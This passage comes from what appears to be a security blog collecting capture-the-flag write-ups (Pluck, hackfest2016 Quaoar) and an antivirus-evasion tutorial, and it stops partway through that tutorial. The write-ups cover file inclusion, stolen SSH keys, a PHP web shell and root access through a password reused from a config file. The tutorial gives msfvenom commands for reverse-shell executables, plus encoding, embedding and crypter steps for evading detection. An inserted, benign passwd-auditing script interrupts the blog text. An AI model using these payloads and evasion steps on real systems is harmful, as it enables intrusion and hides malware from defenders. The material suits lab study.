<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjr-mpdPz4DrX-wDAzwTCIPNfVDhgqAK5h1422lQ3fizwkdeNcBjk_RJwROKmmhmTrC0LAyPg_XXq864SzxuAxX-7X2EJPbHM327YTA0xxGJCmfYp2Chy_zQ5jYVtOvwbT_xuxFsLFOXOM/s1600/asdas.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="340" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjr-mpdPz4DrX-wDAzwTCIPNfVDhgqAK5h1422lQ3fizwkdeNcBjk_RJwROKmmhmTrC0LAyPg_XXq864SzxuAxX-7X2EJPbHM327YTA0xxGJCmfYp2Chy_zQ5jYVtOvwbT_xuxFsLFOXOM/s400/asdas.png" width="400" /></a></div>
<br />
Excellent! Our shell is uploaded; now let's execute it.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiW24auX7juGhv9KxF2LKXIixLcsMfMXsWx_FzqTtkxTQdfr_V6lPTBJnZMFhq2ZGYCf5-DTJn2BZlCDk7JjA7mM6ffaXTZwXFSzqYIhEkXsumhhaeqKTB_TbMoiXq4kr6PXbSIXZHErWk/s1600/shell.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="169" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiW24auX7juGhv9KxF2LKXIixLcsMfMXsWx_FzqTtkxTQdfr_V6lPTBJnZMFhq2ZGYCf5-DTJn2BZlCDk7JjA7mM6ffaXTZwXFSzqYIhEkXsumhhaeqKTB_TbMoiXq4kr6PXbSIXZHErWk/s640/shell.png" width="640" /></a></div>
<br />
Great! We have got a limited shell!<br />
<br />
TBU<br />
<br />
<b>Pluck challenge</b> (2017-03-21)<br />
Hello,<br />
<br />
Let's start the challenge.<br />
<br />
Nmap scanning<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhArOYqOt0s0EXfh0t_d2p4JNFU9LbWZMHixBPORVZRykmtFs7LqhTiZL0DhPdJN1jdMV6GXqkM712jlGoAq501_Mp8xJCQPtWrKyh6vTxCg7SDQd2ZcGGp-0HhC0MOSONCljwPKaLhgY4/s1600/nmap.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="111" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhArOYqOt0s0EXfh0t_d2p4JNFU9LbWZMHixBPORVZRykmtFs7LqhTiZL0DhPdJN1jdMV6GXqkM712jlGoAq501_Mp8xJCQPtWrKyh6vTxCg7SDQd2ZcGGp-0HhC0MOSONCljwPKaLhgY4/s400/nmap.png" width="400" /></a></div>
<br />
OK, we discovered four open ports. Let's begin, as always, with the web application.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgS6Puk7yhAt_U-SpB0KpXK-QXajg_O-7vwmjmRsyFvj8SGL0MWzS3EnGb1wHAsvZwKEU_tL2nDOWtVqy11NJ5ef3zddDXVMLBRyvxCmKhc25Llt_U2biK7DfsFmnU_Oj7VpG53izDZpv4/s1600/pluck.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="279" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgS6Puk7yhAt_U-SpB0KpXK-QXajg_O-7vwmjmRsyFvj8SGL0MWzS3EnGb1wHAsvZwKEU_tL2nDOWtVqy11NJ5ef3zddDXVMLBRyvxCmKhc25Llt_U2biK7DfsFmnU_Oj7VpG53izDZpv4/s320/pluck.png" width="320" /></a></div>
<br />
So, let's dig deeper into the web application. We can also see that the dashboard has a link to the admin panel.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMtA0Sn1rmiBZ9uH7Xt6xbOqk98Hn8I4hI0CX9UPk7APstbZ-CMOLkqIH8M6olRJVYc7iS1AV6ew5psswjDaBBAz1MJt6xtUTlRn496d-n5BYVSalyy23YflsKZshO84r_tzO9s8Ay_9w/s1600/passwd.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="113" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMtA0Sn1rmiBZ9uH7Xt6xbOqk98Hn8I4hI0CX9UPk7APstbZ-CMOLkqIH8M6olRJVYc7iS1AV6ew5psswjDaBBAz1MJt6xtUTlRn496d-n5BYVSalyy23YflsKZshO84r_tzO9s8Ay_9w/s320/passwd.png" width="320" /></a></div>
<br />
Good, we discovered an LFI. We can see a very interesting piece of information in /etc/passwd, namely:<br />
<blockquote class="tr_bq">
backup-user:x:1003:1003:Just to make backups easier,,,:/backups:/usr/local/scripts/backup.sh
</blockquote>
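As an added example (not code from the original post), here is a small audit script that flags /etc/passwd entries like the one above, where the login shell is a script rather than a shell registered in /etc/shells; the sample passwd and shells contents are constructed for the demo.

```python
"""Flag /etc/passwd accounts whose login shell is not a registered shell.

Added example, not code from the original post. The backup-user entry on the
Pluck box has a backup script as its login shell; an auditor wants such
accounts listed, because the script runs as that user on every login and
usually reveals what gets backed up and where.
"""
import sys
from dataclasses import dataclass

# Shells that only refuse logins; they are often absent from /etc/shells on
# purpose, so they must not be reported as suspicious.
NOLOGIN_STUBS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}

# Constructed sample input: the backup-user line quoted in the post plus a few
# ordinary accounts. Not a dump of the real box.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
alice:x:1000:1000:Alice,,,:/home/alice:/bin/bash
backup-user:x:1003:1003:Just to make backups easier,,,:/backups:/usr/local/scripts/backup.sh
"""
SAMPLE_SHELLS = """\
# /etc/shells: valid login shells (constructed sample)
/bin/sh
/bin/bash
"""


@dataclass
class PasswdEntry:
    name: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text):
    """Parse passwd(5) lines; blank lines and comments are skipped."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, _pw, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(name, int(uid), int(gid), gecos, home, shell))
    return entries


def parse_shells(text):
    """Return the set of shells registered in /etc/shells."""
    return {s.strip() for s in text.splitlines() if s.strip() and not s.startswith("#")}


def audit(passwd_text, shells_text):
    """Return (account, reason, detail) triples worth a second look."""
    shells = parse_shells(shells_text)
    findings = []
    for e in parse_passwd(passwd_text):
        if e.shell in NOLOGIN_STUBS:
            continue  # disabled account, nothing to see
        if e.shell not in shells:
            findings.append((e.name, "login shell not in /etc/shells", e.shell))
        if e.uid == 0 and e.name != "root":
            findings.append((e.name, "uid 0 account other than root", e.shell))
        if e.uid >= 1000 and not e.home.startswith("/home/"):
            findings.append((e.name, "home directory outside /home", e.home))
    return findings


def main():
    # With two file arguments audit real files; otherwise run on the sample.
    if len(sys.argv) == 3:
        with open(sys.argv[1]) as pw, open(sys.argv[2]) as sh:
            results = audit(pw.read(), sh.read())
    else:
        results = audit(SAMPLE_PASSWD, SAMPLE_SHELLS)
    for name, reason, detail in results:
        print(f"{name}: {reason} ({detail})")


if __name__ == "__main__":
    main()
```

Run it as `python3 audit_passwd.py /etc/passwd /etc/shells` on a real host; without arguments it reports on the constructed sample.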
Let's try to display the content of that file.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguBbYZir8HnKvUrl5tFtWbiJAOmdeOBg9Yyv5BXJcyEHY6Wpbj0h6NdMU-bDrbaz0XZQAB8zdNGboasXDf123SrkCWi1nEqsVGPYyTch4HJVscTrrA7lwvWE-cuIXkGug79frZwfpIguE/s1600/backup.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="100" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguBbYZir8HnKvUrl5tFtWbiJAOmdeOBg9Yyv5BXJcyEHY6Wpbj0h6NdMU-bDrbaz0XZQAB8zdNGboasXDf123SrkCWi1nEqsVGPYyTch4HJVscTrrA7lwvWE-cuIXkGug79frZwfpIguE/s320/backup.png" width="320" /></a></div>
<br />
We know that our target hosts a TFTP service, and if we can connect to it we will (probably) be able to download the /backups/backup.tar file.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFmZvN44ASHCXdPa71u7ZNRXQvkgg0RcXhMkN1qe8FuVgRTCsNFP70I3xMkMDDjgZU-_GU-MZbj7kVs48Zwpi7_GW8J-6t656Rh6_Wu3WJ6I6VzsBOkbuODWwB4nQ6BuUFSL8hG769ei4/s1600/tfto.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="116" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFmZvN44ASHCXdPa71u7ZNRXQvkgg0RcXhMkN1qe8FuVgRTCsNFP70I3xMkMDDjgZU-_GU-MZbj7kVs48Zwpi7_GW8J-6t656Rh6_Wu3WJ6I6VzsBOkbuODWwB4nQ6BuUFSL8hG769ei4/s320/tfto.png" width="320" /></a></div>
<br />
Excellent! Let's examine what the <b>backup.tar</b> file contains.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqYo_EqBwXOulqo_vgUQAQevXjVQZDKbwFsSkkU8vUAqdMvrpcEjz7F93gxShyphenhyphen_PKYLB1HmTD8zwFP2vZvKbgk4sgIApgtocnMMXC9260mLr-8R6P0e-mByOI8ti-akB-KWbNRiiofPh8/s1600/www.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqYo_EqBwXOulqo_vgUQAQevXjVQZDKbwFsSkkU8vUAqdMvrpcEjz7F93gxShyphenhyphen_PKYLB1HmTD8zwFP2vZvKbgk4sgIApgtocnMMXC9260mLr-8R6P0e-mByOI8ti-akB-KWbNRiiofPh8/s320/www.png" width="203" /></a></div>
<br />
Wow, as far as I can tell the file is a backup of /var/www/html/* and /home/*! In particular, in /home/* we will be able to find some SSH keys.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWEryqIujhHF0kd_M0an4E0VoU8FGzDZnRRAVh8ex7mFSPSDO-PfL6iK12mCH3VOWWXJ33WOSV1_S897pbDlcwY_JC4M9OnDoxbFXZbjhzTr5gQSxxQtXSJ7zokXdEhGpvosTK3NPVTbs/s1600/keys.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWEryqIujhHF0kd_M0an4E0VoU8FGzDZnRRAVh8ex7mFSPSDO-PfL6iK12mCH3VOWWXJ33WOSV1_S897pbDlcwY_JC4M9OnDoxbFXZbjhzTr5gQSxxQtXSJ7zokXdEhGpvosTK3NPVTbs/s320/keys.png" width="320" /></a></div>
<br />
Awesome! Using <b>id_key4</b>, we get the following screen<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGUgjlwvwaKFdDRkrpCkj434YzCiad6STpI5-SW83A6DwFP8VMrdmotY6BD3Sw3PODjUjMqxE-s_u-KuDznlSXDLtNSgZhZBCsSJEy4UwyElR68qwgNSY4Q2VQ8ljsXGv4JCB1Dmm214o/s1600/kuku.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="259" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGUgjlwvwaKFdDRkrpCkj434YzCiad6STpI5-SW83A6DwFP8VMrdmotY6BD3Sw3PODjUjMqxE-s_u-KuDznlSXDLtNSgZhZBCsSJEy4UwyElR68qwgNSY4Q2VQ8ljsXGv4JCB1Dmm214o/s320/kuku.png" width="320" /></a></div>
<br />
Editing /home/paul/keys/id_key1.pub via "Edit file", we are able to get paul's shell using the vim trick: <b>:set shell=/bin/bash</b> followed by <b>:shell</b>.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyWEmwEgwU0ECrGA01EG32ioKKFiAVCBc354UVFRQxaQWC3Hb6MCFbOI_UFXiHJwNjfuXspAENKNicrMDLssEcD8akcmAZjY4EvTy5ORPQ7rgEKDvweE3Lurj7PWs6Aw4269Ewgpk9jXY/s1600/puck.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="32" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyWEmwEgwU0ECrGA01EG32ioKKFiAVCBc354UVFRQxaQWC3Hb6MCFbOI_UFXiHJwNjfuXspAENKNicrMDLssEcD8akcmAZjY4EvTy5ORPQ7rgEKDvweE3Lurj7PWs6Aw4269Ewgpk9jXY/s320/puck.png" width="320" /></a></div>
<br />
Excellent! We have got a limited shell! We can see that the Linux kernel is 4.8, so we can find a working local privilege escalation exploit.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvbv1Ftq7YQlV1uU5wdHdWfffu1C0olbwkQb79YsPrr2um-_WWX21rSu9qiCKevuSkm-ig2HwgtbGvj-mvSmwb1n8k_32xue_FrOPhxW59RE3hvUGlavBEAbQ6UKuYJ6n7RbGJ1E6VxS8/s1600/cowroto.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="206" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvbv1Ftq7YQlV1uU5wdHdWfffu1C0olbwkQb79YsPrr2um-_WWX21rSu9qiCKevuSkm-ig2HwgtbGvj-mvSmwb1n8k_32xue_FrOPhxW59RE3hvUGlavBEAbQ6UKuYJ6n7RbGJ1E6VxS8/s320/cowroto.png" width="320" /></a></div>
<br />
Very good! We are root!<br />
<br />
Game over<br />
<br />
hackfest2016: Quaoar (rgolebiowski, published 2017-03-20)<br />
<br />
Hello everyone!<br />
<br />
Today I would like to present to you the hackfest2016 Quaoar walkthrough :)<br />
<br />
Nmap scanning<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDQDxANsCZGLpimxPlPYbaVLLttuX53tFqq81EIfVuxgF5fMbqrTWRccTYt1nukpef6ac0em786fwAu1KLCJQy0G4gLuKtGuVknOetp2ocvZRo8ZaEGh-EbRX_0x0oyTwZBPJIyov1GPs/s1600/Screenshot+from+2017-03-20+10-09-03.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="130" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDQDxANsCZGLpimxPlPYbaVLLttuX53tFqq81EIfVuxgF5fMbqrTWRccTYt1nukpef6ac0em786fwAu1KLCJQy0G4gLuKtGuVknOetp2ocvZRo8ZaEGh-EbRX_0x0oyTwZBPJIyov1GPs/s400/Screenshot+from+2017-03-20+10-09-03.png" width="400" /></a></div>
<br />
Wow, there is a bunch of open ports.<br />
<br />
I started with Samba enumeration, but I didn't find anything interesting except the Samba version (3.6.3).<br />
<br />
So I decided to try to find something within the web application.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvWXIfJlyLe2To50XG9X2pvwpzCDN8fD53ccmP-7uY8RQdEyMKUa71pXswRu-WKcl1dfhMMeHXbIQb7rM1mdy5qd37t__iJ1ct7dsxd1l2zkVbvlMeAzKtrFcGgs1ayx2MqNbavE2SfT0/s1600/web.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="237" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvWXIfJlyLe2To50XG9X2pvwpzCDN8fD53ccmP-7uY8RQdEyMKUa71pXswRu-WKcl1dfhMMeHXbIQb7rM1mdy5qd37t__iJ1ct7dsxd1l2zkVbvlMeAzKtrFcGgs1ayx2MqNbavE2SfT0/s400/web.png" width="400" /></a></div>
<br />
Dirbuster found some helpful (?) paths.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEii9UXYf19Ojmuwwv5FiucY-ULXyVBLdfy2Hck26pnthWN85obFlbhY18U0hqNZL-8zb7qdQ8s9DWkxE-dm9U7YlosWwqWUlb50iZMIcP9ajGTCNTmjcV089VcDhUDM-h_rxv0Upt19M28/s1600/dirbuster.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="133" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEii9UXYf19Ojmuwwv5FiucY-ULXyVBLdfy2Hck26pnthWN85obFlbhY18U0hqNZL-8zb7qdQ8s9DWkxE-dm9U7YlosWwqWUlb50iZMIcP9ajGTCNTmjcV089VcDhUDM-h_rxv0Upt19M28/s400/dirbuster.png" width="400" /></a></div>
<br />
Now we know that the web application runs the WordPress CMS. So, if we can learn a username from the posts on the website, we will be able to use wpscan to try to brute-force this user's password.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmHE4wjsD0JpUJRkilsxqK9mb3IQecUxqMc6C-H2G7noHnle1fYkAq9PZdAEmaiuvHFm6nZkPT2icrtMkyT8JoMoy1Ch_HphcbMGgWbGzTyM_nCRBgkaqUPCd_7L1yCcCJuHZOYV4gbIg/s1600/wp-login.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmHE4wjsD0JpUJRkilsxqK9mb3IQecUxqMc6C-H2G7noHnle1fYkAq9PZdAEmaiuvHFm6nZkPT2icrtMkyT8JoMoy1Ch_HphcbMGgWbGzTyM_nCRBgkaqUPCd_7L1yCcCJuHZOYV4gbIg/s400/wp-login.png" width="333" /></a></div>
<br />
After trying admin:admin - success!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKIMLnR0ADZfbhifLg1m8Ig6KtyXIKxmIYDfpVgXF0W78EfCcsXCma4d_pEXL9BGYeXvx-xwkhEMJi7pUseG9K6nhLGxLROvzL0mY384cjQ8NcmD7BkZt5MkK-mxQPdqJPYBKfVJCt-tA/s1600/admin_wp.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKIMLnR0ADZfbhifLg1m8Ig6KtyXIKxmIYDfpVgXF0W78EfCcsXCma4d_pEXL9BGYeXvx-xwkhEMJi7pUseG9K6nhLGxLROvzL0mY384cjQ8NcmD7BkZt5MkK-mxQPdqJPYBKfVJCt-tA/s400/admin_wp.png" width="400" /></a></div>
<br />
Excellent! Let's try to edit some plugin or similar and upload a reverse PHP shell.<br />
I edited the existing Akismet plugin and activated it.<br />
Then I requested the appropriate path to run our uploaded web shell.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0vGYi39H64NKcdH6NTFPLpQiVcSR31LaeIIrrttxDPxVWBvKAprLlU6VTcr8YduCT5RiOWuEE3kwuWh0YAl5RXxtR__oIbfaDZXy5BBE7MqMdfpq7ftGJW7qwmTaZDtUxfptWRXnHeuI/s1600/spawn.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="206" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0vGYi39H64NKcdH6NTFPLpQiVcSR31LaeIIrrttxDPxVWBvKAprLlU6VTcr8YduCT5RiOWuEE3kwuWh0YAl5RXxtR__oIbfaDZXy5BBE7MqMdfpq7ftGJW7qwmTaZDtUxfptWRXnHeuI/s400/spawn.png" width="400" /></a></div>
<br />
Amazing, we have got a limited shell. Now we have to escalate our privileges.<br />
I went to <b>/var/www/wordpress</b> and found the <b>config</b> file there.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6QN8mRpzQCgQUw0apFS_-C6nsCpR51UesoDEojY-slAoHFq5MctVUAZxQnAiVG53M_OdzIoUOM2oSE7iqE-Vs8v9DS-Mn_ybx9q7KkLW53q3b9wKBHF1eVCLHmAdEQZh1sazIXJDoG-8/s1600/config.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="251" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6QN8mRpzQCgQUw0apFS_-C6nsCpR51UesoDEojY-slAoHFq5MctVUAZxQnAiVG53M_OdzIoUOM2oSE7iqE-Vs8v9DS-Mn_ybx9q7KkLW53q3b9wKBHF1eVCLHmAdEQZh1sazIXJDoG-8/s400/config.png" width="400" /></a></div>
<br />
Great! We have valid MySQL credentials, so let's make use of them.<br />
Hmmm, rootpassword! Maybe it is also valid for the Linux root account?<br />
BINGO!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFQ7JvARgKMOyQGvOjIQjplbgTN1MusB25fN8iDKZCykjTOIFbyK7iu5OxOBIbP0lAZw79ZGseqT5MqWxN1WYHMhk74CW8nuaFVuzsImhW7fl3e3QQO59b4yGtAoeRg3OpxXsxDFtyYpY/s1600/root_fglag.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="244" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFQ7JvARgKMOyQGvOjIQjplbgTN1MusB25fN8iDKZCykjTOIFbyK7iu5OxOBIbP0lAZw79ZGseqT5MqWxN1WYHMhk74CW8nuaFVuzsImhW7fl3e3QQO59b4yGtAoeRg3OpxXsxDFtyYpY/s320/root_fglag.png" width="320" /></a></div>
<br />
Game over!<br />
<br />
<br />
VirusTotal challenge (rgolebiowski, published 2017-03-10)<br />
<br />
Hello everyone,<br />
<br />
Today I would like to present several methods of evading antivirus mechanisms.<br />
<br />
Within this article I will use a couple of tools: Metasploit, Shellter and Veil-Evasion.<br />
<br />
The article concludes with a comparison of how effective the generated payloads are.<br />
<br />
1. Metasploit Framework<br />
<ul>
<li>msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=$port -f exe -o shell_reverse.exe</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFQkcTjZKz7Ih1E5EPwNeB6_CxYt1y_A63juqu4jPe6PtSDpDL2QDPApY0jNfzH_HV6k5PuW1LnZm3NJLLiVL99DMqVxMhp_zrZEN6dtLY7WKvnlnI5speYUX7f-oIgUpjBECgVvpcvRQ/s1600/zwykly.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="423" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFQkcTjZKz7Ih1E5EPwNeB6_CxYt1y_A63juqu4jPe6PtSDpDL2QDPApY0jNfzH_HV6k5PuW1LnZm3NJLLiVL99DMqVxMhp_zrZEN6dtLY7WKvnlnI5speYUX7f-oIgUpjBECgVvpcvRQ/s640/zwykly.png" width="640" /></a></div>
I think that is a poor result: 43/59 AV engines flagged our payload as malicious.<br />
<br />
Let's try to generate the same payload, but with encoding<br />
<ul>
<li>msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=$port -f exe -e x86/shikata_ga_nai -i 9 -o shell_reverse_msf_encoded.exe</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR4MyOqgjNTaarelvgtgMFwF753RbJzI3IMQ5a3zp8P7TA8G204G7sAuzBrJTQPk64dvQIJ1BFtLtOaxW4Pu8kY5lDGheQ982P38KfNdIvOtNUkkD1mK4d2_GqAtOlJ2xpdCOdSuqJa4E/s1600/encodowany.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="415" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR4MyOqgjNTaarelvgtgMFwF753RbJzI3IMQ5a3zp8P7TA8G204G7sAuzBrJTQPk64dvQIJ1BFtLtOaxW4Pu8kY5lDGheQ982P38KfNdIvOtNUkkD1mK4d2_GqAtOlJ2xpdCOdSuqJa4E/s640/encodowany.png" width="640" /></a></div>
The same poor result.<br />
<br />
Now, let's try injecting our malicious payload into another program.<br />
<ul>
<li>msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=$port -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJT-jpLR1_AoLI6hi742hVOE4llt8eG_M1M4iU3wJMqTkOLYr5nZjQyXMn4hb-reWhvoYSXhRYyJbI5ZeQo_LkO-8sRUFRHcCcmW4Aswenq0LYoV488SK_WMKBkutYfTH_aqtyBvKEzVk/s1600/incject.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="425" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJT-jpLR1_AoLI6hi742hVOE4llt8eG_M1M4iU3wJMqTkOLYr5nZjQyXMn4hb-reWhvoYSXhRYyJbI5ZeQo_LkO-8sRUFRHcCcmW4Aswenq0LYoV488SK_WMKBkutYfTH_aqtyBvKEzVk/s640/incject.png" width="640" /></a></div>
Better, but it still doesn't suit us. Let's try wrapping the payload with the Hyperion crypter:<br />
<br />
<ul>
<li>cp shell_reverse_msf_encoded_embedded.exe backdoor.exe</li>
<li>cp /usr/share/windows-binaries/Hyperion-1.0.zip .</li>
<li>unzip Hyperion-1.0.zip</li>
<li>cd Hyperion-1.0/</li>
<li>i686-w64-mingw32-g++ Src/Crypter/*.cpp -o hyperion.exe</li>
<li>cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libgcc_s_sjlj-1.dll .</li>
<li>cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libstdc++-6.dll .</li>
<li>wine hyperion.exe ../backdoor.exe ../crypted.exe</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiZinHpAulaU4UllCjekCt1gxrSIoLQpBjp5c9O4KpCMYsOw6Zr4gbtxZtbrrnOhIMV1g7zMc4VssCxTgzWO9yO_uTvbRYFbMmQ2YFCZUpJzYQkjoJGG040HPBhjFgwHp0fqR4EJJXcBA/s1600/hyperion.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="370" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiZinHpAulaU4UllCjekCt1gxrSIoLQpBjp5c9O4KpCMYsOw6Zr4gbtxZtbrrnOhIMV1g7zMc4VssCxTgzWO9yO_uTvbRYFbMmQ2YFCZUpJzYQkjoJGG040HPBhjFgwHp0fqR4EJJXcBA/s640/hyperion.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Hmmm, still too high a detection ratio.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
2. Veil-evasion</div>
<div class="separator" style="clear: both; text-align: left;">
Veil-Evasion is a very useful tool which is compatible with Metasploit payloads.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzppPNeMCi9mJLAFZZY9qPRa_CHYTV8o5rsS_iK1x7GEITAckkFRrtJt3wgZApRfFQa9dwXTgVviQm2Hl2VD8y4UX_9433Gm6D1hKXjsczovFW9aNJ5984fWwDJA-pchH2rOpvMZD8zRI/s1600/veil.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="228" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzppPNeMCi9mJLAFZZY9qPRa_CHYTV8o5rsS_iK1x7GEITAckkFRrtJt3wgZApRfFQa9dwXTgVviQm2Hl2VD8y4UX_9433Gm6D1hKXjsczovFW9aNJ5984fWwDJA-pchH2rOpvMZD8zRI/s400/veil.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Let's list the payloads</div>
<div class="separator" style="clear: both; text-align: center;">
